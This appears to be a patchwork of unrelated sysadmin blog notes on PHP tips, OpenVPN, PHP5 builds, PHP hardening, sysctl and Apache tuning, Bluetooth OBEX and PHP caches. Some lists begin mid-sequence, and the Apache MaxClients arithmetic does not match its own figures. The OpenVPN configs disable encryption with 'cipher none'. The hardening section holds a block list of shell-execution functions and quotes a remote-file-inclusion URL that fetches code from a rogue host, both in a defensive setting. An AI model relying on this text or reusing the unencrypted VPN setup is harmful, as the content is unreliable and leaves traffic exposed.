error_reporting(E_ALL);
ini_set(‘display_errors’, ’1′);

2. Avoid magic like __get, __set, __autoload

3. require_once() is expensive

4. Use full paths in includes and requires, less time spent on resolving the OS paths.

5. If you need to find out the time when the script started executing, $_SERVER[’REQUEST_TIME’] is preferred to time()

6. See if you can use strncasecmp, strpbrk and stripos instead of regex

7. str_replace is faster than preg_replace, but strtr is faster than str_replace by a factor of 4

8. If the function, such as string replacement function, accepts both arrays and single characters as arguments, and
if your argument list is not too long, consider writing a few redundant replacement statements, passing one character
at a time, instead of one line of code that accepts arrays as search and replace arguments.

9. Error suppression with @ is very slow.

10. $row[’id’] is 7 times faster than $row[id]

11. Error messages are expensive

12. Do not use functions inside of for loop, such as for ($x=0; $x < count($array); $x) The count()
function gets called each time.

2. in the edit menu select PREFERENCES

3. under ICON VIEW DEFAULTS  and LIST VIEW DEFAULTS  change the zoom level to 66%  /  50 % or …

4. DONE!

First you need to install OpenVPN from sources or precompiled distro packet.

Then you need to setup of the Certificate Authority (CA)

Keep in mind that the CA should be on client not on the the server. OpenVPN install comes with scripts that can easy create certificates. You should copy them in to /etc/openvpn:

cp -a /usr/share/doc/openvpn/examples/easy-rsa /etc/openvpn

cd /etc/openvpn/easy-rsa

Edit the file called vars and adapt the last KEY_xxx vars to your needs. For my Slackware install the path is: export KEY_DIR=$D/../keys. After that run:

. vars

./clean-all

./build-ca

To create a certificate and sign it in one single step (do that only if the certificate can be transferred to the client via a secure channel, otherwise generate the certificate and the request on the client and sign it on the CA), without password:

For the server, use (don’t forget to give a Common Name):

./build-key-server server

For a client: (don’t forget to give a Common Name)

./build-key Hercule

We also need to make Diffie Hellman key:

./build-dh

For other situations, see easy-rsa/README

To see content of a certificate:

openssl x509 -in server.crt -text

Next you need to configure the server:

# cat server.conf
port 1194
proto udp
dev tap

ca /etc/openvpn/keys/ca.crt
cert /etc/openvpn/keys/server.crt
key /etc/openvpn/keys/server.key # This file should be kept secret
dh /etc/openvpn/keys/dh1024.pem
client-to-client # To allow clients to see each other
server 192.168.10.0 255.255.255.0 # Set to virtual network and subnet mask
client-config-dir /etc/openvpn/ccd
ifconfig-pool-persist ipp.txt

#push “dhcp-option DNS x.x.x.x”
#push “dhcp-option DNS x.x.x.x”
#push “redirect-gateway def1″

keepalive 10 120
#cipher AES-128-CBC # AES
cipher none
comp-lzo
persist-key
persist-tun
user nobody
group nobody
status openvpn-status.log
verb 3

Start the server:

openvpn –config server.conf

Next set up the client:

Copy from server to client files: ca.crt, Hercule.crt, Hercule.key, Hercule.csr

cp /usr/share/doc/openvpn/examples/sample-config-files/client.conf Hercule.ovpn

Edit the lines like this:

diff /usr/share/doc/openvpn/examples/sample-config-files/client.conf Hercule.ovpn
23,24c23,24
< ;dev tap
< dev tun
—
> dev tap
> ;dev tun
42c42
< remote my-server-1 1194
—
> remote x.x.x.x 1194
89,90c89,90
< cert client.crt
< key client.key
—
> cert Hercule.crt
> key Hercule.key
112c112
< ;cipher x
—
> cipher none

Start the client:

openvpn –config /etc/openvpn/Hercule/Hercule.ovpn –cd /etc/openvpn/Hercule/

That’s it, you should have the setup working.

If you use diffrent type of version of openvpn of server and client don’t forget to set up the mtu:

tun-mtu 1500
tun-mtu-extra 32
link-mtu 1590
mssfix

mkdir /usr/local/php5libpng
cd /usr/local/php5libpng

yum install zlib-devel

wget http://kent.dl.sourceforge.net/sourc…-config.tar.gz
gunzip libpng-1.2.8-config.tar.gz
tar -xvf libpng-1.2.8-config.tar

(remove extra dir’s created by the unzipping)

./configure ‘–prefix=/usr/local/php5libpng’ ‘–exec-prefix=/usr/local/php5libpng’
make
make install

yum install mysql-devel
yum install libjpeg-devel

mkdir /usr/local/php5
cd /usr/local/php5

yum install libxml2-devel

yum install curl-devel

wget http://uk2.php.net/get/php-5.1.2.tar…php.net/mirror
gunzip php-5.1.2.tar.gz
tar -xvf php-5.1.2.tar

(remove extra dir’s created by the unzipping)

./configure ‘–host=i386-redhat-linux’ ‘–build=i386-redhat-linux’ ‘–target=i386-redhat-linux-gnu’ ‘–prefix=/usr/local/php5′ ‘–exec-prefix=/usr/local/php5′ ‘–program-suffix=5′ ‘–enable-force-cgi-redirect’ ‘–enable-discard-path’ ‘–enable-exif’ ‘–enable-ftp’ ‘–with-curl’ ‘–with-bz2′ ‘–enable-memory-limit’ ‘–enable-inline-optimization’ ‘–with-openssl’ ‘–with-png’ ‘–with-regex=system’ ‘–with-xml’ ‘–with-zlib’ ‘–enable-sockets’ ‘–enable-mbstring=shared’ ‘–enable-mbstr-enc-trans’ ‘–with-zlib’ ‘–with-png-dir=/usr/local/php5libpng’ ‘–with-gd’ ‘–with-jpeg-dir=/usr/local/php5libjpeg’ ‘–enable-gd-native-ttf’ ‘–with-mysql’

make
make install

Create the file /home/httpd/vhosts/example.com/conf/vhost.conf with the following in it for each site:

ScriptAlias /php5-cgi-custom /home/httpd/vhosts/example.com/httpdocs
Action application/x-httpd-php5-custom “/php5-cgi-custom/php5″

Run: /usr/local/psa/admin/sbin/websrvmng –reconfigure-vhost –vhost-name=example.com

Create a .htaccess file with the following in the directories that need to be run by php5:

AddType application/x-httpd-php5-custom .php

Also don’t forget about short_open_tag ( <? vs <?php ). You may also need to add this to your  .htaccess file:

php_flag short_open_tag On

For each of the sites go to the base httpdocs directory (after ssh’ing in as the site user, not root): /home/httpd/vhosts/example.com/httpdocs/ and run cp /usr/local/php5/bin/php5 ./php5

Then chmod “php5” to 755 (php5 needs to be copied and run locally, since otherwise you get issues with suexec. If you have problems run cat /var/log/httpd/suexec_log and check any errors.

PHP5 should now work.

Disable Dangerous PHP Functions

PHP has a lot of potential to mess up your server and hack user accounts and even get root. I’ve seen many times where users use an insecure PHP script as an entry point to a server to start unleashing dangerous commands and taking control.

Search the php.ini file for:
disable_functions =

Add the following:

disable_functions = dl,system,exec,passthru,shell_exec
disable_functions = dl,system,exec,passthru,shell_exec,proc_open,proc_close
disable_functions = dl,system,exec,passthru,shell_exec,proc_open,proc_get_status,proc_terminate,proc_close,dir,readfile,virtual,

popen,curl_exec,curl_multi_exec,parse_ini_file,show_source

Turn off Register Globals

Register_globals will inject your scripts with all sorts of variables, like request variables from HTML forms. This coupled with the fact that PHP doesn’t require variable initialization means writing insecure code is that much easier.
See http://us2.php.net/register_globals

register_globals = On

Replace it with

register_globals = Off

Run PHP through PHPsuexec Preventing Nobody Access

The biggest problem with PHP is that on cPanel servers is that PHP will run as nobody. When someone sets a script to 777 access that means the nobody user has write access to that file. So if someone on the same shared server wrote a script to search the system for 777 files they could inject anything they wanted, compromising the unsuspecting users account.

PHPsuexec makes PHP run as the user so 777 permissions are not allowed. There are a few downfalls to PHPsuexec but I think it’s required on a shared environment for the security of everyone.  Safe_mode doesn’t prevent you from compromising other users files. This is where PHPsuexec comes in, it stops the user from being able to read another users files. It also makes it easier for you, the administrator, to track PHP mail function spamming and lots of other issues caused by PHP scripts because now you can easily track it ot the users account responsible.

For this you will need to recompile PHP with suexec. On cPanel /scripts/easyapach has this build in.

I hope this has summed up some of the things you can do to help secure PHP on your server. There’s also open_base protection which you can use to prevent users from reading other users files.

In addition to that you can hide the version of the server you’re using, and avoid advertising the version of any modules loaded in your servers response.

If you alter your httpd.conf file to include the following two lines the presence, and version, of the PHP module will be hidden – as will the version of Apache you’re using:
ServerSignature Off
ServerTokens production

Disallow Dangerous Functions

Like perl, or C, PHP has a “system” function which allows scripts to execute commands.

If you’re happy you don’t need this ability in the scripts you’re using then you can disable this function, in case it’s abused by a remote attacker.

To disable functions you merely add their name to the disable_functions option. For example:
disable_functions = dl, phpinfo, system, mail …
Limit Resources

To avoid your PHP installation from consuming too many resources you can place limits on their usage.

The following settings are all useful ways of adjusting the resources your PHP scripts can consume:
; Maximum execution time of each script, in seconds
max_execution_time = 30

; Maximum amount of time each script may spend parsing request data
max_input_time = 60

; Maximum amount of memory a script may consume (8MB)
memory_limit = 8M

; Maximum size of POST data that PHP will accept.
post_max_size = 8M

; Whether to allow HTTP file uploads.
file_uploads = Off

; Maximum allowed size for uploaded files.
upload_max_filesize = 2M

Avoid Opening Remote Files

One of the useful abilities of PHP is the ability to open files remotely without any complex processing.

Many simple scripts use this ability, for example a comic viewer might open up images from a remote server just using the fopen function – which is ordinarily used to open files.

It is an ability has often been abused in insecure scripts though.

If you have a script which tries to open a file and the filename is controllable by a remote user two things can happen:
Any file on the local system which the webserver can read can be viewed by the remote attacker.
Arbitary commands can be executed upon your server if the user can cause a remote PHP file to be opened.

To disable this attack you can set the following in your php.ini file:
; Whether to allow the treatment of URLs (like http:// or ftp://) as files.
;
; This is turned off to avoid variable redefinition by remote attacker
; that attempts to have the server download (and execute) a remote file
; from a compromised host. This behaviour has been observed in automatic
; scanning against badly written applications:
; http://myhost/myapplication.php?include=http://roguesever/rogueapp.php
allow_url_fopen = Off

More examples of tightening up PHP security can be found on the PHP website.

display_errors = Off
log_errors     = On
error_log      = syslog
ignore_repeated_errors = On

/usr/src/linux-`uname -r`/Documentation/networking/ip-sysctl.txt

Next configuration brought my load down from the teens to 99% of the time under 2.

Now, I have a dedicated Linux box running dual xeons and 2gb ram. If you don’t have SSh access, you can pretty much forget about trying this.

Make backups of anything and everything before trying this. I can’t be held responsible for anything u mess up. proceed with caution.

Open /etc/sysctl.conf and replace what is in there with this

# Kernel sysctl configuration file for Red Hat Linux

# Controls IP packet forwarding

net.ipv4.ip_forward = 0

# Controls source route verification

net.ipv4.conf.all.rp_filter = 1

net.ipv4.conf.lo.rp_filter = 1

net.ipv4.conf.eth0.rp_filter = 1

net.ipv4.conf.default.rp_filter = 1

# Disables IP source routing

net.ipv4.conf.all.accept_source_route = 0

net.ipv4.conf.lo.accept_source_route = 0

net.ipv4.conf.eth0.accept_source_route = 0

net.ipv4.conf.default.accept_source_route = 0

# Controls the System Request debugging functionality of the kernel

kernel.sysrq = 0

# Controls whether core dumps will append the PID to the core filename.

# Useful for debugging multi-threaded applications.

kernel.core_uses_pid = 1

# Increase maximum amount of memory allocated to shm

# kernel.shmmax = 1073741824

# Disable ICMP Redirect Acceptance

net.ipv4.conf.all.accept_redirects = 0

net.ipv4.conf.lo.accept_redirects = 0

net.ipv4.conf.eth0.accept_redirects = 0

net.ipv4.conf.default.accept_redirects = 0

# Enable Log Spoofed Packets, Source Routed Packets, Redirect Packets

net.ipv4.conf.all.log_martians = 1

net.ipv4.conf.lo.log_martians = 1

net.ipv4.conf.eth0.log_martians = 1

# Decrease the time default value for tcp_fin_timeout connection

net.ipv4.tcp_fin_timeout = 30

# Decrease the time default value for tcp_keepalive_time connection

net.ipv4.tcp_keepalive_time = 1800

# Turn on the tcp_window_scaling

net.ipv4.tcp_window_scaling = 1

# Turn on the tcp_sack

net.ipv4.tcp_sack = 1

# tcp_fack should be on because of sack

net.ipv4.tcp_fack = 1

# Turn on the tcp_timestamps

net.ipv4.tcp_timestamps = 1

# Enable TCP SYN Cookie Protection

net.ipv4.tcp_syncookies = 1

# Enable ignoring broadcasts request

net.ipv4.icmp_echo_ignore_broadcasts = 1

# Enable bad error message Protection

net.ipv4.icmp_ignore_bogus_error_responses = 1

# Make more local ports available

# net.ipv4.ip_local_port_range = 1024 65000

# Set TCP Re-Ordering value in kernel to ’5′

net.ipv4.tcp_reordering = 5

# Set SYN ACK retry attempts to ’3′

net.ipv4.tcp_synack_retries = 3

# Various Settings

net.core.netdev_max_backlog = 1024

# Increase the maximum number of skb-heads to be cached

net.core.hot_list_length = 256

# Increase the tcp-time-wait buckets pool size

net.ipv4.tcp_max_tw_buckets = 360000

# This will increase the amount of memory available for socket input/output queues

net.core.rmem_default = 65535

net.core.rmem_max = 8388608

net.ipv4.tcp_rmem = 4096 87380 8388608

net.core.wmem_default = 65535

net.core.wmem_max = 8388608

net.ipv4.tcp_wmem = 4096 65535 8388608

net.ipv4.tcp_mem = 8388608 8388608 8388608

net.core.optmem_max = 40960

After you make the changes to make them effective without rebooting, simply run the following commands:

/sbin/sysctl -p

/sbin/sysctl -w net.ipv4.route.flush=1

Another example is of a host wich was under a 5mbit syn flood attack for the past few days. Enabling syncookies instantly dropped the load averages. Despite still being under attack, the site is as responsive as ever:

net.ipv4.ip_forward=0

kernel.sysrq=0

kernel.core_uses_pid=1

kernel.shmmax = 134217728

net.ipv4.conf.all.rp_filter = 1

net.ipv4.conf.lo.rp_filter = 1

net.ipv4.conf.eth0.rp_filter = 1

net.ipv4.conf.default.rp_filter = 1

net.ipv4.conf.all.accept_source_route = 0

net.ipv4.conf.lo.accept_source_route = 0

net.ipv4.conf.eth0.accept_source_route = 0

net.ipv4.conf.default.accept_source_route = 0

net.ipv4.conf.all.accept_redirects = 0

net.ipv4.conf.lo.accept_redirects = 0

net.ipv4.conf.eth0.accept_redirects = 0

net.ipv4.conf.default.accept_redirects = 0

net.ipv4.tcp_fin_timeout = 20

net.ipv4.tcp_keepalive_time = 1800

net.ipv4.tcp_sack = 1

net.ipv4.tcp_fack = 1

net.ipv4.tcp_syncookies = 1

net.ipv4.icmp_echo_ignore_broadcasts = 1

net.ipv4.icmp_ignore_bogus_error_responses = 1

net.ipv4.ip_local_port_range = 16384 65536

net.core.netdev_max_backlog = 512

net.core.rmem_default = 65535

net.core.rmem_max = 8388608

net.ipv4.tcp_rmem = 4096 87380 8388608

net.core.wmem_default = 65535

net.core.wmem_max = 8388608

net.ipv4.tcp_wmem = 4096 65535 8388608

net.ipv4.tcp_mem = 8388608 8388608 8388608

net.core.optmem_max = 40960

fs.file-max=16384

kernel.threads-max=2048

A tcp_max_syn_backlog variable defines how many half-open connections can be kept by the backlog queue. For instance 256 is a total number of half-open connections handled in memory by Linux RedHat 7.3. The TCP/IP stack variables can be configured by sysctl or standard Unix commands. The following example shows how to change the default size of the backlog queue by the sysctl command:

# sysctl -w net.ipv4.tcp_max_syn_backlog=”2048″

Apache configuration

httpd.conf is a file file, usually located at /usr/local/apache/conf/httpd.conf path containing configuration settings for apache server. Cannot find the location of the file? Use locate command: >cd / then >locate httpd.conf. You may find the values in conf/extra directory. Search for http-mpm.conf and http-default.conf

Main parameters to tune are:

In Apache MPM Prefork Module:

1. StartServers
2. MinSpareServers
3. MaxSpareServers
4. ServerLimit
5. MaxClients
6. MaxRequestsPerChild

KeepAlive options:

1. KeepAlive
2. KeepAliveTimeout
3. MaxKeepAliveRequests

Timeout options:

1. Timeout

Apache MPM Prefork Module

Another handy tweak is to make some adjustments to the Apache MPM prefork module. This is assuming you are using Apache in prefork mode, which is highly recommended and likely if you are on a small VPS.

This module controls the number of processes and spare processes Apache will start and run. This is especially important if you are running a small VPS that is handling MySQL and Apache. Unless you are getting slammed with really heavy traffic on a regular basis (in which case you should be on a dedicated server) there is no need to be running the default configuration. Find these lines in your httpd.conf file:
<IfModule prefork.c>
StartServers 8
MinSpareServers 5
MaxSpareServers 20
ServerLimit 256
MaxClients 256
MaxRequestsPerChild 4000
</IfModule>

MinSpareservers and MaxSpareServers control the number of spare processes your webserver is permitted to run and StartServers controls how many are started by default.

ServerLimit – controls the maximum configured value for MaxClients.

MaxClients – sets the limit on the number of simultaneous requests that can be supported.

Reducing MaxClients on a webserver that is serving dynamic content (e.g. WordPress) can make a big difference. If you experience a traffic spike on your VPS and your MaxClients is set too high your server will more than likely get stuck in an endless loop of swapping pages from physical memory to virtual memory, commonly referred to as thrashing. The accepted way of calculating an appropriate MaxClients value is dividing your total available system memory by the size per Apache process. For example, if you had a 500MB left for Apache to use and each Apache process was using around 20MB you would set your MaxClients to (512-12) / 10 = 50. To check real time memory usage on your VPS use top.Want to set it to a larger value? Add more physical RAM.  In other words, calculate the average of your httpd process, divide total available memory by the average leaving some for the system. E.g. in case of 1 Gig RAM and average httpd process size 7MB on this server it is safe to set it to 100.

If you use MySQL database, MaxClients parameter should be equal or close to max_connections parameter in MySQL conf file (my.cnf)

MaxRequestsPerChild -  limits the number of requests a child server will handle during it’s life. We can safely reduce this value and realize a small gain.

So let’s go ahead and pare down those values:
<IfModule prefork.c>
StartServers 3
MinSpareServers 3
MaxSpareServers 10
ServerLimit 50
MaxClients 50
MaxRequestsPerChild 2000
</IfModule>

Remember these are not concrete “best” values, they depend on the size of your VPS and how small or large you Apache process is.

Optimize Your KeepAlive

KeepAlive allows your visitors to issue multiple requests over the same TCP connection, in theory this helps improve latency because your visitors can request your webpage, images, and javascripts all over one connection. Unfortunately, Apache must use a worker process to service each and every request. The worker process stays busy servicing each request for a full 15 seconds by default, even if your visitor is no longer using it! This means you have less worker processes available on your system at any given time. With the limited system resources you have on your small VPS we always want open worker processes to be actually working. One way of accomplishing this is turning off KeepAlive. Find this line in your httpd.conf file:
KeepAlive On

and change it to:
KeepAlive Off

If you have a site with lots of images and javascripts it is usually better leave KeepAlive turned on and make some additional tweaks.

If you decide to leave KeepAlive turned on it is important you change the default KeepAliveTimeout value. This prevents unused connections from staying open for excessive amounts of time. Find this line in your httpd.conf file:
KeepAliveTimeout 15

You want to leave this connection open for 2 seconds, just long enough for the client to request most if not all of the necessary files. It is best to se it to minimum, 1-3 seconds. So change that line to:
KeepAliveTimeout 2

If you are going to leave KeepAlive on you will want to increase MaxKeepAliveRequests. Setting this higher allows more requests per connection and increases efficiency. Find this line:
MaxKeepAliveRequests 100

and change it to:
MaxKeepAliveRequests 200

MaxRequestsPerChild – sets how many requests to serve per new httpd child process. You may set it very low, thus constantly freeing the memory, however on a particular case values like 15 or 20 may work well. As an example our site showing 10 images per page has this parameter set to 15.

MinSpareServers

MaxSpareServers

StartServers

Adjust Timeout

Another minor tweak that will give you a small performance boost as well as help reduce the effects of a DOS attack is changing the TimeOut Directive. This directive tells Apache how many seconds to wait while receiving an incoming request, processing it, and sending back a response. Find this line:
Timeout 120

and change it to:
Timeout 40

After you change settings in httpd.conf do not forget to restart apache. You may do this from control panel or from command line > service httpd restart

# sdptool search OPUSH

Inquiring …

Searching for OPUSH on 00:1F:01:28:B2:36 …

Service Name: OBEX Object Push

Service RecHandle: 0×10001

Service Class ID List:

“OBEX Object Push” (0×1105)

Protocol Descriptor List:

“L2CAP” (0×0100)

“RFCOMM” (0×0003)

Channel: 9

“OBEX” (0×0008)

Language Base Attr List:

code_ISO639: 0x656e

encoding: 0x6a

base_offset: 0×100

Profile Descriptor List:

“OBEX Object Push” (0×1105)

Version: 0×0100

As you can see it runs on channel 9. Now to upload some files:

# obex_test -b 00:1F:01:28:B2:36 9

Using Bluetooth RFCOMM transport

OBEX Interactive test client/server.

> c

Connect OK!

Version: 0×10. Flags: 0×00

> p

PUT file (local, remote)> /root/www_starhost_ro.jpg www_starhost_ro.jpg

name=/root/www_starhost_ro.jpg, size=72674

Going to send 72674 bytes

Made some progress…

Made some progress…

Made some progress…

PUT successful!

>

q

#

Somne other intresting commands:

# hcitool scan

Scanning …

00:12:D2:30:E8:00 Adelita

#

# sdptool browse 00:1F:01:28:B2:36

Browsing 00:1F:01:28:B2:36 …

Service Name: Network Access Point Service

Service Description: Personal Ad-hoc Network Service which provides access to a network

Service RecHandle: 0×10000

Service Class ID List:

“Network Access Point” (0×1116)

Protocol Descriptor List:

“L2CAP” (0×0100)

PSM: 15

“BNEP” (0x000f)

Version: 0×0100

SEQ8: dd 6

Language Base Attr List:

code_ISO639: 0x656e

encoding: 0x6a

base_offset: 0×100

Profile Descriptor List:

“Network Access Point” (0×1116)

Version: 0×0100

Service Name: OBEX Object Push

Service RecHandle: 0×10001

Service Class ID List:

“OBEX Object Push” (0×1105)

Protocol Descriptor List:

“L2CAP” (0×0100)

“RFCOMM” (0×0003)

Channel: 9

“OBEX” (0×0008)

Language Base Attr List:

code_ISO639: 0x656e

encoding: 0x6a

base_offset: 0×100

Profile Descriptor List:

“OBEX Object Push” (0×1105)

Version: 0×0100

Service Name: OBEX File Transfer

Service RecHandle: 0×10002

Service Class ID List:

“OBEX File Transfer” (0×1106)

Protocol Descriptor List:

“L2CAP” (0×0100)

“RFCOMM” (0×0003)

Channel: 10

“OBEX” (0×0008)

Language Base Attr List:

code_ISO639: 0x656e

encoding: 0x6a

base_offset: 0×100

Profile Descriptor List:

“OBEX File Transfer” (0×1106)

Version: 0×0100

Service Name: Dial-up networking

Service RecHandle: 0×10003

Service Class ID List:

“Dialup Networking” (0×1103)

“Generic Networking” (0×1201)

Protocol Descriptor List:

“L2CAP” (0×0100)

“RFCOMM” (0×0003)

Channel: 1

Language Base Attr List:

code_ISO639: 0x656e

encoding: 0x6a

base_offset: 0×100

Profile Descriptor List:

“Dialup Networking” (0×1103)

Version: 0×0100

Service Name: Nokia PC Suite

Service RecHandle: 0×10004

Service Class ID List:

“Serial Port” (0×1101)

Protocol Descriptor List:

“L2CAP” (0×0100)

“RFCOMM” (0×0003)

Channel: 15

Language Base Attr List:

code_ISO639: 0x656e

encoding: 0x6a

base_offset: 0×100

Service Name: COM 1

Service RecHandle: 0×10005

Service Class ID List:

“Serial Port” (0×1101)

Protocol Descriptor List:

“L2CAP” (0×0100)

“RFCOMM” (0×0003)

Channel: 3

Language Base Attr List:

code_ISO639: 0x656e

encoding: 0x6a

base_offset: 0×100

Service Name: Voice Gateway

Service RecHandle: 0×10006

Service Class ID List:

“Handsfree Audio Gateway” (0x111f)

“Generic Audio” (0×1203)

Protocol Descriptor List:

“L2CAP” (0×0100)

“RFCOMM” (0×0003)

Channel: 13

Language Base Attr List:

code_ISO639: 0x656e

encoding: 0x6a

base_offset: 0×100

Profile Descriptor List:

“Handsfree” (0x111e)

Version: 0×0105

Service Name: Audio Gateway

Service RecHandle: 0×10007

Service Class ID List:

“Headset Audio Gateway” (0×1112)

“Generic Audio” (0×1203)

Protocol Descriptor List:

“L2CAP” (0×0100)

“RFCOMM” (0×0003)

Channel: 12

Language Base Attr List:

code_ISO639: 0x656e

encoding: 0x6a

base_offset: 0×100

Profile Descriptor List:

“Headset” (0×1108)

Version: 0×0100

Service Name: SyncML Client

Service RecHandle: 0×10009

Service Class ID List:

UUID 128: 00000002-0000-1000-8000-0002ee000002

Protocol Descriptor List:

“L2CAP” (0×0100)

“RFCOMM” (0×0003)

Channel: 11

“OBEX” (0×0008)

Language Base Attr List:

code_ISO639: 0x656e

encoding: 0x6a

base_offset: 0×100

Service Name: SIM ACCESS

Service RecHandle: 0x1000e

Service Class ID List:

“SIM Access” (0x112d)

“Generic Telephony” (0×1204)

Protocol Descriptor List:

“L2CAP” (0×0100)

“RFCOMM” (0×0003)

Channel: 4

Language Base Attr List:

code_ISO639: 0x656e

encoding: 0x6a

base_offset: 0×100

Profile Descriptor List:

“SIM Access” (0x112d)

Version: 0×0101

rfcomm connect rfcomm0 00:1F:01:28:B2:36 1

# rfcomm

rfcomm0: 00:1F:01:28:B2:36 channel 1 clean

The Zend Optimizer goes over the code generated by the standard Zend run-time compiler and optimizes it for faster execution. The standard Zend run-time compiler used by PHP is indeed very fast, generating code that is usually 2 to 10 times faster. But an application that uses Zend Optimizer can execute scripts another 40% to 100% faster.

Here are the steps for instaling it.

You must be root in order to install it.

Get optimizer form here:

http://www.zend.com/free_download/optimizer

#tar -vxzf ZendOptimizer-3.3.3-linux-glibc23-x86_64.tar.gz

#cd ZendOptimizer-3.3.3-linux-glibc23-x86_64

#./install.sh

Answer to those questions.

Add in your php.ini those lines:

[Zend]
zend_extension_manager.optimizer=/usr/local/Zend/lib/Optimizer-3.3.3
zend_extension_manager.optimizer_ts=/usr/local/Zend/lib/Optimizer_TS-3.3.3
zend_optimizer.version=3.3.0
zend_extension=/usr/local/Zend/lib/ZendExtensionManager.so
zend_extension_ts=/usr/local/Zend/lib/ZendExtensionManager_TS.so

Restart apache:

/sbin/service httpd restart

You should have:

# php -v | grep Optimizer
with Zend Optimizer v3.3.3, Copyright (c) 1998-2007, by Zend Technologies
#

The Alternative PHP Cache (APC) is a free, open, and robust framework for caching and optimizing

PHP intermediate code. It’s an PECL extension which shares the packaging and distribution system

with its sister, PEAR.

Ubuntu/Debian install:

First you need to install dependencies for compilation:

$ sudo aptitude install apache2-dev php5-dev build-essential

Get current version of apc and install it

$ wget http://pecl.php.net/get/APC-3.0.16.tgz

$ tar xzf APC-3.0.16.tgz

$ cd APC-3.0.16

$ phpize

$ ./configure –enable-apc –enable-apc-mmap \

–with-apxs=/usr/bin/apxs2 \

–with-php-config=/usr/bin/php-config

$ make

$ sudo make install

You need to add in /etc/php5/apache2/php.ini extension=apc.so . After that just restart apache:

$ sudo apache2ctl restart

Slackware Install:

# wget http://pecl.php.net/get/APC-3.0.19.tgz

# tar -vxzf APC-3.0.19.tgz

# cd APC-3.0.19

#phpize
# which apxs
/usr/sbin/apxs# which php-config
/usr/bin/php-config
# ./configure –enable-apc –enable-apc-mmap –with-apxs=/usr/sbin/apxs –with-php-config=/usr/bin/php-config
#make
#checkinstall –fstrans=no -S -y
#installpkg APC-3.0.19-i386-1.tgz

Add extension=apc.so in /etc/httpd/php.ini and reload apache:

# /etc/rc.d/rc.httpd restart

Now a phpinfo(); should show you a new apc section.